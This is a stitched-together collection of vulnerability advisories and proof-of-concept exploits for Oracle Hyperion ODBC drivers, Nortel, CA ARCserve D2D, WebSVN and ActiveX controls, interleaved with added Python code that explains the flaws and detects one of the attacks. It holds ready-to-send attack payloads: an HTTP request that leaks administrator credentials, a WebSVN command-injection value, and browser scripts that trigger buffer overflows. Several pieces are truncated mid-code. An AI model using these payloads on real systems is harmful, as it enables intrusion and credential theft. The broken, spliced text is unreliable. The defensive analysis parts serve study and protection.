Oracle Hyperion Performance Management and BI (v11.1.2.1.0)

download url of the Oracle Hyperion suite: http://www.oracle.com/technetwork/middleware/epm/downloads/index.html

files tested:
SystemInstaller-11121-win32.zip
FoundationServices-11121-win32-Part1.zip
FoundationServices-11121-win32-Part2.zip
FoundationServices-11121-win32-Part3.zip
FoundationServices-11121-win32-Part4.zip
FoundationServices-11121-Part5.zip
FoundationServices-11121-Part6.zip
FoundationServices-11121-Part7.zip
StaticContent-11121.zip
RandAFoundation-11121.zip
EPM_Architect-11121.zip

Vulnerability:
The mentioned product installs various drivers to allow the software to get information from ODBC data sources. Some of them are vulnerable to a remote stack based buffer overflow which can be triggered by specifying an overlong HOST attribute inside the connection string. The software tries to do a Unicode/ASCII conversion; in doing this, the stack is completely smashed, allowing the execution flow to be redirected to a user supplied buffer.

Analysis for (*) and errata corrige, too many nights awake:

When receiving the attribute, arsqls24.dll does a Unicode/ASCII conversion; this fragment of code counts the number of bytes needed and stores it in eax:

..
01D45C10  83C1 02          add ecx,2
01D45C13  83C0 01          add eax,1
01D45C16  66:8339 00       cmp word ptr ds:[ecx],0
01D45C1A ^75 F4            jnz short ARSQLS24.01D45C10
..

the next operation is a copy loop which moves the needed bytes to a memory region pointed to by ecx, trusting the eax counter:

..
01D48C36  8A16             mov dl,byte ptr ds:[esi]
01D48C38  83E8 01          sub eax,1
01D48C3B  8811             mov byte ptr ds:[ecx],dl
01D48C3D  83C1 01          add ecx,1
01D48C40  83C6 02          add esi,2
01D48C43  85C0             test eax,eax
01D48C45 ^75 EF            jnz short ARSQLS24.01D48C36
..

The memory region pointed to by ecx is adjacent to critical structures (stack pointers), so when the HOST attribute is an overlong string the stack is partially overwritten with user supplied values. The result, after a few steps:

EAX 00000000
ECX 0003
EDX 02B52E88
EBX 0013C720 ASCII AA
ESP 0013C720 ASCII AA
EBP 0013D1A4
ESI 02B56FF8
EDI 0001
EIP 41414141

C 0  ES 0023 32bit 0(FFFFFFFF)
P 1  CS 001B 32bit 0(FFFFFFFF)
A 0  SS 0023 32bit 0(FFFFFFFF)
Z 0  DS 0023 32bit 0(FFFFFFFF)
S 0  FS 003B 32bit 7FFDF000(FFF)
T 0  GS 0000 NULL
D 0
O 0  LastErr WSAHOST_NOT_FOUND (00002AF9)
EFL 00010206 (NO,NB,NE,A,NS,PE,GE,G)
MM0 MM1 MM2 MM3 MM4 MM5 MM6 8000 MM7 FEE0

poc:
The underlying operating system contains the ADODB Connection ActiveX control, which is marked safe for initialization and safe for scripting (it implements the IObjectSafety interface) and could allow a remote attacker to specify the mentioned connection string. The IE security settings do not allow a connection to be opened from another domain, but this can be used in conjunction with an XSS vulnerability, connection string pollution, SQL injection vulnerabilities or through specific configuration files.

Note also that I am mentioning the ADODB object purely for convenience: once installed, the ODBC drivers are available system-wide, so this is a good basis for remote privilege elevations of many kinds.

Note that Internet Explorer does not crash when trying to execute EIP; attach a tool like faultmon to the IE sub-process.

(*)

<!-- saved from url=(0014)about:internet -->
<script>
var obj = new ActiveXObject("ADODB.Connection");
x="";
for (i=0;i<666;i++){x = x + }
obj.ConnectionString ="DRIVER=DataDirect 6.0 SQL Server Native Wire Protocol;HOST=" + x + ";IP=127.0.0.1;PORT=9;DB=xx;UID=sa;PWD=null";
obj.Open();
</script>

<!-- saved from url=(0014)about:internet -->
<script>
var obj = new ActiveXObject("ADODB.Connection");
x="";
for (i=0;i<1666;i++){x = x + }
obj.ConnectionString ="DRIVER=DataDirect 6.0 Greenplum Wire Protocol;HOST=" + x + ";IP=127.0.0.1;PORT=9;DB=DB2DATA;UID=sa;PWD=null";
obj.Open();
</script>

<!-- saved from url=(0014)about:internet -->
<script>
var obj = new ActiveXObject("ADODB.Connection");
x="";
for (i=0;i<1666;i++){x = x + }
obj.ConnectionString ="DRIVER=DataDirect 6.0 Informix Wire Protocol;HOST=" + x +
Nortel Contact Recording Centralized Archive 6.5.1 EyrAPIConfiguration getSubKeys() Remote SQL Injection Exploit
<?php
/*
Nortel Contact Recording Centralized Archive 6.5.1 EyrAPIConfiguration Web Service getSubKeys() Remote SQL Injection Exploit

tested against:
Microsoft Windows Server 2003 r2 sp2
Microsoft SQL Server 2005 Express

download uri: ftp://ftp.avaya.com/incoming/Up1cku9/tsoweb/web1/software/c/contactcenter/crqm/6_5_CS1K_2/Nortel-DVD3-Archive-6_5.iso

background:
This software installs a Tomcat http server which listens on port 8080 for incoming connections. It exposes the following servlet, as declared inside c:\Program Files\[chosen folder]\Tomcat5\webapps\EyrAPI\WEB-INF\web.xml :

..
<servlet-mapping>
  <servlet-name>EyrAPIConfiguration</servlet-name>
  <url-pattern>/EyrAPIConfiguration/*</url-pattern>
</servlet-mapping>
..

at the following url:
http://[host]:8080/EyrAPI/EyrAPIConfiguration/EyrAPIConfigurationIf

Vulnerability:
without prior authentication, you can reach a web service with various methods available, as described inside the associated wsdl, see file:
c:\Program Files\[chosen folder]\Tomcat5\webapps\EyrAPI\WEB-INF\classes\EyrAPIConfiguration.wsdl

among them, the getSubKeys() method. Now look at getSubKeys() inside the decompiled
c:\Program Files\[chosen folder]\Tomcat5\webapps\EyrAPI\WEB-INF\classes\com\eyretel\eyrapi\EyrAPIConfigurationImpl.class :

..
    public String getSubKeys(boolean iterateSubKeys, boolean includeValues, String systemId, String componentId, String sysCompId, String userName)
        throws RemoteException
    {
        StringBuffer xml;
        ConfigOwnerId configOwnerId;
        Connection conn;
        PreparedStatement pStmt;
        ResultSet rs;
        PreparedStatement pStmt2;
        ResultSet rs2;
        log.info((new StringBuilder()).append("Request getSubKeys: iterateSubKeys=").append(iterateSubKeys).append(", includeValues=").append(includeValues).append(", SystemId=").append(systemId).append(", componentId=").append(componentId).append(", sysCompId=").append(sysCompId).append(", userName=").append(userName).toString());
        xml = new StringBuffer("<ConfigurationNodeList>");
        configOwnerId = null;
        conn = null;
        pStmt = null;
        rs = null;
        pStmt2 = null;
        rs2 = null;
        try
        {
            conn = SiteDatabase.getInstance().getConnection();
            if(EyrAPIProperties.getInstance().getProperty("database", "MSSQLServer").equalsIgnoreCase("Oracle"))
            {
                if(componentId.compareToIgnoreCase("") == 0)
                    componentId = "*";
                if(systemId.compareToIgnoreCase("") == 0)
                    systemId = "*";
                if(sysCompId.compareToIgnoreCase("") == 0)
                    sysCompId = "*";
                if(userName.compareToIgnoreCase("") == 0)
                    userName = "*";
                pStmt = conn.prepareStatement((new StringBuilder()).append("SELECT ConfigOwnerID FROM ConfigOwnerView WHERE nvl(ComponentID, '*') = '").append(componentId).append("' AND ").append("nvl(SystemID, '*') = '").append(systemId).append("' AND ").append("nvl(SysCompID, '*') = '").append(sysCompId).append("' AND ").append("nvl(UserName, '*') = '").append(userName).append("'").toString());
                rs = pStmt.executeQuery();
            } else
            {
                pStmt = conn.prepareStatement((new StringBuilder()).append("SELECT ConfigOwnerID FROM ConfigOwnerView WHERE ISNULL(CONVERT(varchar(36), ComponentID), '') = '").append(unpunctuate(componentId)).append("' AND ").append("ISNULL(CONVERT(varchar(36), SystemID), '') = '").append(unpunctuate(systemId)).append("' AND ").append("ISNULL(CONVERT(varchar(36), SysCompID), '') = '").append(unpunctuate(sysCompId)).append("' AND ").append("ISNULL(UserName, '') = '").append(unpunctuate(userName)).append("'").toString());
                rs = pStmt.executeQuery();
            }
            if(rs.next())
            {
                String strConfigOwnerId = rs.getString(1);
                if(!rs.wasNull())
                    configOwnerId = new ConfigOwnerId(strConfigOwnerId);
                pStmt2 = conn.prepareStatement((new StringBuilder()).append("SELECT ConfigGroupID, ConfigGroupName FROM ConfigGroupView WHERE ConfigOwnerID = '").append(configOwnerId.toString()).append("'").toString());
                for(rs2 = pStmt2.executeQuery(); rs2.next(); xml.append(getSubKeyValuesInc(new Integer(rs2.getInt(1)), iterateSubKeys, includeValues)));
            }
        }
        catch(SQLException e)
        {
            String msg = "Unable to get subkeys";
            log.error(msg, e);
            throw new RemoteException(msg, e);
        }
        catch(GenericDatabaseException e)
        {
            String msg = "Unable to get subkeys";
            log.error(msg, e);
            throw new RemoteException(msg, e);
        }
        DbHelper.closeStatement(log, pStmt);
        DbHelper.closeResultSet(log, rs);
        DbHelper.closeStatement(log, pStmt2);
        DbHelper.closeResultSet(log, rs2);
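What the string-building branch above does, and what a parameterised statement does instead, in a runnable form. This is an added Python/sqlite demonstration, not Nortel's code: ConfigOwnerView is rebuilt in memory with two constructed rows, ISNULL(CONVERT(...)) becomes COALESCE so the query runs on sqlite, and the unpunctuate() helper (whose behaviour the advisory does not show) is left out, so the concatenated query is exactly the pattern of the decompiled code. The PreparedStatement in the original is prepared from an already-concatenated string, so it gives none of the protection shown by lookup_safe().

```python
import sqlite3
from typing import List


def make_demo_db() -> sqlite3.Connection:
    """In-memory stand-in for ConfigOwnerView, filled with constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE ConfigOwnerView ("
        " ConfigOwnerID TEXT, ComponentID TEXT, SystemID TEXT,"
        " SysCompID TEXT, UserName TEXT)"
    )
    conn.executemany(
        "INSERT INTO ConfigOwnerView VALUES (?, ?, ?, ?, ?)",
        [
            ("owner-1", "comp-a", "sys-1", None, None),
            ("owner-2", "comp-b", "sys-1", None, "alice"),
        ],
    )
    return conn


def build_query_unsafe(component_id: str, system_id: str,
                       sys_comp_id: str, user_name: str) -> str:
    """The pattern of the decompiled MSSQL branch: caller-supplied values are
    pasted into the SQL text between single quotes, so a quote inside a value
    ends the literal and the rest of the value becomes SQL syntax."""
    return (
        "SELECT ConfigOwnerID FROM ConfigOwnerView"
        " WHERE COALESCE(ComponentID, '') = '" + component_id + "'"
        " AND COALESCE(SystemID, '') = '" + system_id + "'"
        " AND COALESCE(SysCompID, '') = '" + sys_comp_id + "'"
        " AND COALESCE(UserName, '') = '" + user_name + "'"
    )


def lookup_unsafe(conn: sqlite3.Connection, component_id: str, system_id: str,
                  sys_comp_id: str, user_name: str) -> List[str]:
    sql = build_query_unsafe(component_id, system_id, sys_comp_id, user_name)
    return [row[0] for row in conn.execute(sql)]


def lookup_safe(conn: sqlite3.Connection, component_id: str, system_id: str,
                sys_comp_id: str, user_name: str) -> List[str]:
    """Same lookup with bound parameters: values are sent to the engine
    separately from the statement text and can never become syntax."""
    sql = (
        "SELECT ConfigOwnerID FROM ConfigOwnerView"
        " WHERE COALESCE(ComponentID, '') = ?"
        " AND COALESCE(SystemID, '') = ?"
        " AND COALESCE(SysCompID, '') = ?"
        " AND COALESCE(UserName, '') = ?"
    )
    params = (component_id, system_id, sys_comp_id, user_name)
    return [row[0] for row in conn.execute(sql, params)]


def unsafe_query_is_rewritten(conn: sqlite3.Connection, user_name: str) -> bool:
    """True when the value changed the statement.  sqlite rejects the mangled
    text with a syntax error; a value crafted to stay syntactically valid would
    simply execute as written, which is the injection."""
    try:
        lookup_unsafe(conn, "comp-a", "sys-1", "", user_name)
        return False
    except sqlite3.OperationalError:
        return True


if __name__ == "__main__":
    db = make_demo_db()
    print(lookup_unsafe(db, "comp-a", "sys-1", "", ""))      # benign input works
    print(unsafe_query_is_rewritten(db, "O'Brien"))            # a quote breaks the statement
    print(lookup_safe(db, "comp-a", "sys-1", "", "O'Brien"))   # bound parameter: just no match
```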
Embarcadero ER/Studio XE2 Server Portal Tom Sawyer's Default GET Extension Factory ActiveX Control Remote Code Execution
See: CVE-2011-2217
reference url: http://www.securityfocus.com/bid/48099

The mentioned product is vulnerable to the same issue.

download url: https://downloads.embarcadero.com/free/er_studio_portal

ActiveX settings:
ProgID: TomSawyer.DefaultExtFactory.5.5.3.238.VS7.1
CLSID: {658ED6E7-0DA1-4ADD-B2FB-095F08091118}
Binary path: D:\Program Files\Embarcadero\ERStudioPortal1.6\PortalIntf\tsgetx71ex553.dll
Safe for scripting (registry): true
Safe for initialize (registry): true

poc:

<script>
var obj = new ActiveXObject("TomSawyer.DefaultExtFactory.5.5.3.238.VS7.1");
</script>

then the dll will try to call into an uninitialized memory region, which is reachable by an attacker through heap spray.

//rgod
CA ARCserve D2D r15 GWT RPC Request Auth Bypass / Credentials Disclosure and Commands Execution
<?php
/*
CA ARCserve D2D r15 GWT RPC Request Auth Bypass / Credentials Disclosure and Commands Execution PoC

product homepage: http://arcserve.com/us/default.aspx
file tested: CA_ARCserve_D2D_Setup_BMR.zip
tested against: Microsoft Windows Server 2003 r2 sp2

This software installs a Tomcat HTTP server which listens on port 8014 for incoming connections (this port is also added automatically to the firewall exceptions, which exacerbates the vulnerability I am going to describe). It uses a GWT RPC (Google Web Toolkit Remote Procedure Call) mechanism to receive messages from the Administrator's browser.

Without prior authentication, a remote user with access to the web server can send a POST request to the homepageServlet servlet containing the getLocalHost message and the correct filename of a certain descriptor to disclose the username and password of the target application. This username and password pair is a set of Windows credentials with Administrator privileges, requested during the ARCserve installation process (it clearly says this: a user from the Administrators group).

This works with the mentioned software perfectly installed and configured and after the Administrator user has logged in *one time each Tomcat session, logged out or not* (which I think is easily exploitable against a production service running twenty four hours a day). You could also choose to resend the request indefinitely, waiting for the Administrator to be logged in.

Example packet:

POST /contents/service/homepage HTTP/1.1
Content-Type: text/x-gwt-rpc; charset=utf-8
User-Agent: GoogleBot/2.1
Host: 192.168.0.1:8014
Content-Length: 149
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: donotshowgettingstarted=%7B%22state%22%3Atrue%7D

5|0|4|http://192.168.0.1:8014/contents/|2C6B33BED38F825C48AE73C093241510|com.ca.arcflash.ui.client.homepage.HomepageService|getLocalHost|1|2|3|4|0|

Note that '2C6B33BED38F825C48AE73C093241510' is a static value which represents the filename of a gwt rpc descriptor which can be found inside the default path:
C:\Program Files\CA\ARCserve D2D\TOMCAT\webapps\ROOT\contents\2C6B33BED38F825C48AE73C093241510.gwt.rpc

Note also that this packet does not contain any session id.

Response packet:

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Disposition: attachment
Content-Type: application/json;charset=utf-8
Content-Length: 480
Date: Wed, 13 Jul 2011 18:57:19 GMT

//OK[0,17,16,8,15,14,8,13,-3,12,11,8,10,9,8,7,0,6,5,0,4,3,8,2,1,1,["com.ca.arcflash.ui.client.model.TrustHostModel/1126245943","com.extjs.gxt.ui.client.data.RpcMap/3441186752","port","java.lang.Integer/3438268394","Selected","java.lang.Boolean/476441737","hostName","java.lang.String/2004016611","RGOD_9SG","uuid","1a580961-1aa7-4225-b3aa-a522649c16ec","type","user","Administrator","password","MY_PASSWORD","Protocol"],0,5]

Clear text! Clear text!!!

Username - Administrator
Password - MY_PASSWORD

A remote attacker could then log in to the affected application and execute arbitrary commands with Administrator group privileges in the following way:

Browse Backup settings;
Click the Advanced tab;
Check "Run a command before backup is started";
Fill the white field with the desired command, ex. cmd /c start calc ;
Fill the credentials fields with the gained username and password (you can use the same you had before);
Select an existing backup destination in the Protection Settings tab;
Browse to the main page and click Backup Now;
Select Incremental Backup and press OK;
calc.exe is launched various times.

Other attacks are possible.

Vulnerable code and explanation:

web.xml :

..
<servlet>
  <servlet-name>homepageServlet</servlet-name>
  <servlet-class>com.ca.arcflash.ui.server.HomepageServiceImpl</servlet-class>
  <load-on-startup>1</load-on-startup>
</servlet>
<servlet-mapping>
  <servlet-name>homepageServlet</servlet-name>
  <url-pattern>/contents/service/homepage</url-pattern>
</servlet-mapping>
..

the decompiled HomepageServiceImpl.class :

..
    public TrustHostModel getLocalHost()
        throws BusinessLogicException, ServiceConnectException, ServiceInternalException
    {
        try
        {
            TrustedHost trustedhost = getLocalWebServiceClient().getLocalHostAsTrust();
            TrustHostModel trusthostmodel = ConvertToModel(trustedhost);
            return trusthostmodel;
        }
        catch(AxisFault axisfault)
        {
            axisfault.printStackTrace();
        }
        return null;
    }
..

the decompiled WebServiceClient.class :

..
    public TrustedHost getLocalHostAsTrust()
        throws AxisFault
    {
        Object aobj[] = invokeWebMethod("getLocalHostAsTrust", new Object[0], new Class[] {
            // com/ca/arcflash/webservice/data/TrustedHost
        });
        return (TrustedHost)aobj[0];
    }
..

a request to the FlashServiceImpl Axis2 Web Service is originated; note that the ip address originating the request is
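A detection for this packet shape, as an added Python example that is neither CA's code nor part of the advisory: it decodes the GWT-RPC request envelope, extracts the service interface and method, and flags sensitive calls that arrive without a session cookie. It assumes Tomcat's default JSESSIONID cookie name (the product's real cookie name is not in the advisory). The first sample body is the request from the advisory; the other two are constructed to exercise the detector.

```python
from typing import Dict, List, Optional, Tuple

# Tomcat's default session cookie; the product's actual cookie name is an assumption.
SESSION_COOKIE = "JSESSIONID"

# Service/method pairs that must never be reachable without a session.
# The pair below is the one the advisory shows.
SENSITIVE_CALLS = {
    ("com.ca.arcflash.ui.client.homepage.HomepageService", "getLocalHost"),
}

# Constructed sample requests.  The first body is the packet from the advisory;
# the second adds a (constructed) session cookie, the third calls a made-up,
# harmless method so the detector has something to ignore.
SAMPLE_REQUESTS = [
    {"path": "/contents/service/homepage",
     "cookie": "donotshowgettingstarted=%7B%22state%22%3Atrue%7D",
     "body": "5|0|4|http://192.168.0.1:8014/contents/|2C6B33BED38F825C48AE73C093241510|"
             "com.ca.arcflash.ui.client.homepage.HomepageService|getLocalHost|1|2|3|4|0|"},
    {"path": "/contents/service/homepage",
     "cookie": "JSESSIONID=CONSTRUCTED0123456789; donotshowgettingstarted=%7B%22state%22%3Atrue%7D",
     "body": "5|0|4|http://192.168.0.1:8014/contents/|2C6B33BED38F825C48AE73C093241510|"
             "com.ca.arcflash.ui.client.homepage.HomepageService|getLocalHost|1|2|3|4|0|"},
    {"path": "/contents/service/homepage",
     "cookie": "",
     "body": "5|0|5|http://192.168.0.1:8014/contents/|2C6B33BED38F825C48AE73C093241510|"
             "com.ca.arcflash.ui.client.homepage.HomepageService|constructedHarmlessMethod|"
             "java.lang.String/2004016611|1|2|3|4|1|5|0|"},
]


def _unescape(s: str) -> str:
    # GWT escapes '|' inside table strings as '\!' and a backslash as '\\'.
    return s.replace("\\!", "|").replace("\\\\", "\\")


def parse_gwt_rpc(body: str) -> Optional[Dict[str, object]]:
    """Decode the envelope of a GWT-RPC request (pipe-delimited, version >= 5).

    Layout: version | flags | string-table size | strings... | integers.
    The integers index the string table (1-based, 0 = null).  The first four
    are module base URL, serialization policy strong name, service interface
    and method name; the fifth is the parameter count.  Returns None for
    anything that is not a well-formed envelope.
    """
    parts = body.split("|")
    if parts and parts[-1] == "":
        parts.pop()  # the trailing delimiter
    if len(parts) < 3:
        return None
    try:
        version, flags, table_size = (int(p) for p in parts[:3])
    except ValueError:
        return None
    if version < 5 or table_size < 0:
        return None
    table = [_unescape(s) for s in parts[3:3 + table_size]]
    if len(table) != table_size:
        return None
    try:
        indices = [int(p) for p in parts[3 + table_size:]]
    except ValueError:
        return None
    if len(indices) < 5:
        return None

    def lookup(i: int) -> Optional[str]:
        return table[i - 1] if 0 < i <= table_size else None

    return {
        "version": version,
        "flags": flags,
        "module_base": lookup(indices[0]),
        "strong_name": lookup(indices[1]),
        "service": lookup(indices[2]),
        "method": lookup(indices[3]),
        "param_count": indices[4],
    }


def has_session_cookie(cookie_header: str) -> bool:
    return any(c.strip().startswith(SESSION_COOKIE + "=")
               for c in cookie_header.split(";"))


def find_unauthenticated_sensitive_calls(requests) -> List[Tuple[str, str, str]]:
    """Return (path, service, method) for sensitive calls that carry no session."""
    findings = []
    for req in requests:
        msg = parse_gwt_rpc(req["body"])
        if msg is None:
            continue
        key = (msg["service"], msg["method"])
        if key in SENSITIVE_CALLS and not has_session_cookie(req["cookie"]):
            findings.append((req["path"], msg["service"], msg["method"]))
    return findings


if __name__ == "__main__":
    for finding in find_unauthenticated_sensitive_calls(SAMPLE_REQUESTS):
        print("unauthenticated sensitive GWT-RPC call:", finding)
```

The check on the cookie is only a proxy for "no session"; the durable fix is server-side, in the servlet, which must tie getLocalHost to an authenticated session rather than rely on the client to have one.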
WebSVN 2.3.2 Unproper Metacharacters Escaping exec() Remote Commands Injection Vulnerability
WebSVN 2.3.2 Unproper Metacharacters Escaping exec() Remote Commands Injection Vulnerability

tested against:
Microsoft Windows Server R2 SP2
PHP 5.3.6 VC9 with magic_quotes_gpc = off (default)
Apache 2.2.17 VC9

Introduction:
This is a very special vulnerability, given the incredibly high number of machines involved. This can be verified by submitting the following queries to Google:

"Powered by WebSVN * and Subversion"
"Powered by WebSVN 2.3.2 and Subversion"

homepage url: http://websvn.tigris.org/

Description says:
WebSVN offers a view onto your subversion repositories that's been designed to reflect the Subversion methodology. You can view the log of any file or directory and see a list of all the files changed, added or deleted in any given revision. You can also view compare two versions of a file so as to see exactly what was changed in a particular revision. Since it's written using PHP, WebSVN is very portable and easy to install.

Vulnerability:
Without prior authentication, if the 'allowDownload' option is enabled in config.php, meaning that a tarball download is allowed across all the repositories (not uncommon), an attacker can invoke the dl.php script and pass a well formed 'path' argument to execute arbitrary commands against the underlying operating system.

Vulnerable code: look at dl.php, lines 114-139:

..
	} else {
		@unlink($tempDir);
		mkdir($tempDir);

		// Create the name of the directory being archived
		$archiveName = $path;
		$isDir = (substr($archiveName, -1) == '/');
		if ($isDir) {
			$archiveName = substr($archiveName, 0, -1);
		}

		$archiveName = basename($archiveName);
		if ($archiveName == '') {
			$archiveName = $rep->name;
		}

		$plainfilename = $archiveName;
		$archiveName .= '.r'.$rev;

		// Export the requested path from SVN repository to the temp directory
		$svnExportResult = $svnrep->exportRepositoryPath($path, $tempDir.DIRECTORY_SEPARATOR.$archiveName, $rev, $peg);
		if ($svnExportResult != 0) {
			header('HTTP/1.x 500 Internal Server Error', true, 500);
			error_log('svn export failed for: '.$archiveName);
			print 'svn export failed for '.xml_entities($archiveName).'.';
			removeDirectory($tempDir);
			exit(0);
		}
..

then look at the exportRepositoryPath() function inside ./include/svnlook.php, lines 879-896:

..
	// {{{ exportDirectory
	//
	// Exports the directory to the given location

	function exportRepositoryPath($path, $filename, $rev = 0, $peg = '') {
		$cmd = $this->svnCommandString('export', $path, $rev, $peg).' '.quote($filename); //<---
		$retcode = 0;
		execCommand($cmd, $retcode); //<--
		if ($retcode != 0) {
			global $lang;
			error_log($lang['BADCMD'].': '.escape($cmd));
		}
		return $retcode;
	}

	// }}}
..

again look at the execCommand() function inside ./include/command.php, lines 107-123:

..
// {{{ execCommand

function execCommand($cmd, &$retcode) {
	global $config;

	// On Windows machines, the whole line needs quotes round it so that it's
	// passed to cmd.exe correctly
	// Since php 5.3.0 the quoting seems to be done internally
	if ($config->serverIsWindows && version_compare(PHP_VERSION, '5.3.0alpha') === -1) {
		$cmd = '"'.$cmd.'"'; // nonsense ...
	}

	return @exec($cmd, $tmp, $retcode); //<- boom
}

// }}}
..

also, look at quote() inside ./include/command.php:

..
// {{{ quote
//
// Quote a string to send to the command line

function quote($str) {
	global $config;

	if ($config->serverIsWindows) {
		return '"'.$str.'"'; //<--- !!!
	} else {
		return escapeshellarg($str); // this should work properly on Linux instead
	}
}

// }}}
..

Example packet:

POST /websvn/dl.php HTTP/1.1
User-Agent: Mozilla/4.0
Host: 192.168.0.1
Accept: */*
Cookie: storedsesstemplate=.%00; storedtemplate=.%00;
Content-Length: 42
Content-Type: application/x-www-form-urlencoded

path=./../../x%22%7Cver%3Esuntzu.txt%7C%22

the resulting command line is like this:

c:\SVN\bin\svn --non-interactive --config-dir C:\SVN\tmp\export URL%20to%20repository%20%28e.g.%20file:///d:/SubVersion/proj%29./../../x%22%7Cver%3Esuntzu.txt%7C%22@ "C:\Documents and Settings\Administrator\Local Settings\Temp\web554.tmp\x"|ver>suntzu.txt|".r"
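Why the double quotes in quote() do not help, and what the safe shape of the call is, as an added Python example (not WebSVN's code): it derives the archive name that dl.php builds from the request path, lists what cmd.exe would treat as a metacharacter outside quotes once that name is wrapped in '"' the way WebSVN does on Windows, and builds the svn invocation as an argument vector so that no shell parses it at all. The svn binary, repository URL and destination directory are constructed values, and subprocess.list2cmdline is Python's own CreateProcess-style escaping, shown to illustrate that an embedded quote must be escaped even when no shell is involved.

```python
import posixpath
import subprocess
from typing import List

# The decoded 'path' value from the advisory's example request (constructed copy).
SAMPLE_PATH = './../../x"|ver>suntzu.txt|"'
SAMPLE_REV = "554"


def websvn_windows_quote(s: str) -> str:
    """Reproduces what WebSVN 2.3.2's quote() does on Windows: wrap the value
    in double quotes and escape nothing."""
    return '"' + s + '"'


def cmd_metachars_outside_quotes(cmdline: str) -> List[str]:
    """List cmd.exe metacharacters that fall outside a quoted region.

    cmd.exe toggles its quote state on every '"' and has no escape character,
    so a '"' inside an argument ends the quoted region early and whatever
    follows is interpreted by the shell.
    """
    special = set('|&<>^')
    in_quotes = False
    found = []
    for ch in cmdline:
        if ch == '"':
            in_quotes = not in_quotes
        elif ch in special and not in_quotes:
            found.append(ch)
    return found


def archive_name_for(path: str, rev: str) -> str:
    """The name dl.php derives: basename of the request path plus '.r<rev>'.
    basename() keeps every metacharacter; only the directory part is dropped."""
    name = posixpath.basename(path.replace("\\", "/").rstrip("/"))
    return name + ".r" + rev


def export_argv(svn_bin: str, repo_url: str, path: str, rev: str,
                dest_dir: str) -> List[str]:
    """Build the svn export command as an argument vector.  Handing this list
    to subprocess.run() with shell=False means no shell ever parses it, so the
    request path is just the bytes of one argument whatever it contains."""
    target = dest_dir + "/" + archive_name_for(path, rev)
    return [svn_bin, "--non-interactive", "export", "-r", rev,
            repo_url + path, target]


def escaped_for_createprocess(arg: str) -> str:
    """How one argument must appear on a Windows command line for the receiving
    process to parse it back as a single literal; subprocess does this itself
    when it is given a list."""
    return subprocess.list2cmdline([arg])


def run_export(argv: List[str]) -> int:
    """Run the export without a shell and return its exit code."""
    return subprocess.run(argv, shell=False, check=False).returncode


if __name__ == "__main__":
    name = archive_name_for(SAMPLE_PATH, SAMPLE_REV)
    print("archive name:", name)
    print("cmd.exe sees outside quotes:", cmd_metachars_outside_quotes(websvn_windows_quote(name)))
    print("escaped single argument:", escaped_for_createprocess(name))
    print("argv:", export_argv("svn", "file:///d:/SubVersion/proj", SAMPLE_PATH, SAMPLE_REV, "C:/tmp/web554.tmp"))
```

The escapeshellarg() branch that WebSVN uses on other platforms is the PHP equivalent of the argument-vector approach only if the command is still run through a shell that honours single quotes; on Windows the real fix is to stop routing the command through cmd.exe (proc_open with bypass_shell, or a library call) rather than to find a better quoting scheme.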
Re: ZDI-11-117: McAfee Firewall Reporter GeneralUtilities.pm isValidClient Authentication Bypass Vulnerability
McAfee stated:

[quote]
Impact of Vulnerability: Disabling Anti-Virus, adding unwanted exclusions
[/quote]

When submitting this bug to ZDI, I made available two reliable post-bypass proof-of-concepts:

- a static perl code injection exploit using the 'args' argument of saveTopImagelogos.cgi
- an upload and execute exploit using uploadFile.cgi

In both cases, the result was remote command execution with SYSTEM privileges. This was tested against the default Apache installation.

ZDI did not acquire post-auth vulnerabilities, so I was considering disclosing them after the patch was out but, in the end, did not. I'm saying this to allow people to classify this vulnerability with the correct metrics.

rgod
RealNetworks RealGames StubbyUtil.ShellCtl.1 ActiveX Control (InstallerDlg.dll v2.6.0.445) Multiple Remote Commands Execution and Code Execution Vulnerabilities
RealNetworks RealGames StubbyUtil.ShellCtl.1 ActiveX Control (InstallerDlg.dll v2.6.0.445) Multiple Remote Commands Execution and Code Execution Vulnerabilities

tested against Internet Explorer 9, Vista sp2
download url: http://www.gamehouse.com/

background:
When choosing to play these online games, e.g. the game called My Farm Life (see url: http://www.gamehouse.com/download-games/my-farm-life ), you download an installer called GameHouse-Installer_am-myfarmlife_gamehouse_.exe. This setup program installs an ActiveX control with the following settings:

CLSID: {80AB3FB6-9660-416C-BE8D-0E2E8AC3138B}
ProgID: StubbyUtil.ShellCtl.1
Binary Path: C:\Program Files\RealArcade\Installer\bin\InstallerDlg.dll
Safe For Initialization (Registry): True
Safe For Scripting (Registry): True

This control is marked safe for scripting and safe for initialization, so Internet Explorer will allow remote web pages to script it.

vulnerability:
This control has four methods implemented insecurely:

ShellExec() - launches arbitrary commands
ShellExecRunAs() - launches arbitrary commands
CreateShortcut() - creates arbitrary executable files inside the automatic startup folders
CopyDocument() - copies arbitrary executable files from a remote network share to local folders, e.g. the automatic startup folders

other attacks are possible, including information disclosure and file deletion; see the typelib:

class IShellCtl { /* GUID={0D60A064-2009-4623-8FC1-F99CAC01037E} */
  /* DISPID=1610612736 */ function QueryInterface( /* VT_PTR [26] [in] -- ? [29] */ $riid, /* VT_PTR [26] [out] -- VT_PTR [26] */ $ppvObj ) { }
  /* DISPID=1610612737 */ /* VT_UI4 [19] */ function AddRef( ) { }
  /* DISPID=1610612738 */ /* VT_UI4 [19] */ function Release( ) { }
  /* DISPID=1610678272 */ function GetTypeInfoCount( /* VT_PTR [26] [out] -- VT_UINT [23] */ $pctinfo ) { }
  /* DISPID=1610678273 */ function GetTypeInfo( /* VT_UINT [23] [in] */ $itinfo, /* VT_UI4 [19] [in] */ $lcid, /* VT_PTR [26] [out] -- VT_PTR [26] */ $pptinfo ) { }
  /* DISPID=1610678274 */ function GetIDsOfNames( /* VT_PTR [26] [in] -- ? [29] */ $riid, /* VT_PTR [26] [in] -- VT_PTR [26] */ $rgszNames, /* VT_UINT [23] [in] */ $cNames, /* VT_UI4 [19] [in] */ $lcid, /* VT_PTR [26] [out] -- VT_I4 [3] */ $rgdispid ) { }
  /* DISPID=1610678275 */ function Invoke( /* VT_I4 [3] [in] */ $dispidMember, /* VT_PTR [26] [in] -- ? [29] */ $riid, /* VT_UI4 [19] [in] */ $lcid, /* VT_UI2 [18] [in] */ $wFlags, /* VT_PTR [26] [in] -- ? [29] */ $pdispparams, /* VT_PTR [26] [out] -- VT_VARIANT [12] */ $pvarResult, /* VT_PTR [26] [out] -- ? [29] */ $pexcepinfo, /* VT_PTR [26] [out] -- VT_UINT [23] */ $puArgErr ) { }
